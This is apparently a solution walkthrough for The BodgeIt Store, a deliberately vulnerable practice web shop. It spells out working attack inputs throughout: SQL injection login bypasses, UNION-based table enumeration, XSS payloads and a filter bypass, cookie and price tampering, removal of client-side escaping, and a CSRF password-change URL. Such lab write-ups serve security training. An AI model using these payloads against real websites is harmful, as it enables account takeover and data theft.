View
source code:
./js/util.js
<!--
td align="center" width="16%"><a
href="admin.jsp">Admin</a></td-->
Website
structure:
home.jsp
about.jsp
contact.jsp
admin.jsp
login.jsp
register.jsp
basket.jsp
search.jsp
advanced.jsp
product.jsp?typeid=1
product.jsp?prodid=1
Login
as test@thebodgeitstore.com:
Login using SQL injection with test@thebodgeitstore.com'
or '1'='1 as username and any password.
Login
as user1@thebodgeitstore.com:
Login using SQL injection, any username
and a' or '1'='1 as password.
Login
as admin@thebodgeitstore.com:
Login using SQL injection with admin@thebodgeitstore.com'
or '1'='1 as username and any password.
Find
hidden content as a non admin user:
View source code of home.jsp, find <!--
td align="center" width="16%"><a
href="admin.jsp">Admin</a></td-->
Find
diagnostic data:
Add debug parameter in seach page: http://192.168.1.101:8080/bodgeit/search.jsp?q=1&debug=true
Level 1: Display a
popup using: <script>alert("XSS")</script>
Input 123<script>alert("XSS")</script> in the search input text field
Level 2: Display a
popup using: <script>alert("XSS")</script>
Register a new user with username as a@a.com<script>alert("XSS")</script>
Access
someone elses basket:
View any product and click "Add to
Basket", then change the value of cookie "b_id" to someone else, such as 1.
Get
the store to owe you money:
Login with registered user and buy something, tamper the submit data
when click "Update Basket" button, then change the quantity to negative, such as -10, submit the data.
Change
your password via a GET request:
View source code in change password page, change the form method
from post to get and then change your password.
Conquer
AES encryption, and display a popup using: <script>alert("H@cked
A3S")</script>:
View source code in advanced.jsp,
|
<SCRIPT>
loadfile('./js/encryption.js'); var key = "31a3fce1-9908-4f"; function validateForm(form){ var query = document.getElementById('query'); var q = document.getElementById('q'); var val = encryptForm(key, form); if(val){ q.value = val; query.submit(); } return false; } function encryptForm(key, form){ var params = form_to_params(form).replace(/</g, '<').replace(/>/g, '>').replace(/"/g, '"').replace(/'/g, '''); if(params.length > 0) return Aes.Ctr.encrypt(params, key, 128); return false; } </SCRIPT> |
Change the "encryptForm" function to
|
function
encryptForm(key, form){
var params = form_to_params(form); if(params.length > 0) return Aes.Ctr.encrypt(params, key, 128); return false;
}
|
Conquer
AES encryption and append a list of table names to the normal results:
First to change the javascript in previous step(in order to see the
detail information, add "?debug=true" to the URL), and try to inject
following SQL:
|
xxxx'
union select (select limit 0 1 table_name from
information_schema.system_tables),2,3,4,5 from products -- 123
|
Got error message displayed:
|
DEBUG
System error: java.sql.SQLException: ORDER BY with LIMIT required in
statement [SELECT PRODUCT, DESC, TYPE, TYPEID, PRICE FROM PRODUCTS AS a JOIN
PRODUCTTYPES AS b ON a.TYPEID = b.TYPEID WHERE PRODUCT LIKE '%xxxx' union
select (select limit 0 1 table_name from information_schema.system_tables)]
|
So add "order by" statement:
|
xxxx'
union select (select limit 0 1 table_name from
information_schema.system_tables order by table_name),2,3,4,5 from products
-- 123
|
We can get the table name!
And change "limit 0 1" to "limit 1 1",
"limit 2 1" …
Finally we got this done.
Contact
us page, input <script>alert("XSS")</script> and submit,
only "alert(XSS)"
displayed in the page, "<script>", "</script>"
and double quotes are filtered,
so change the input to <SCRIPT>alert('XSS')</SCRIPT> and resubmit. XSS happened.
Login
with username and password as:
<script>alert("XSS")</script>/a' or '1'='1
XSS
happened.
Advance
search page in advance.jsp, view the source code and found: onsubmit="return validateForm(this);false;",
delete this event, 500 error happen.
Submit
"http://localhost:8080/bodgeit/password.jsp?password1=111111&password2=111111"
in contact.jsp, if the admin view the feedback, CSRF will happen.
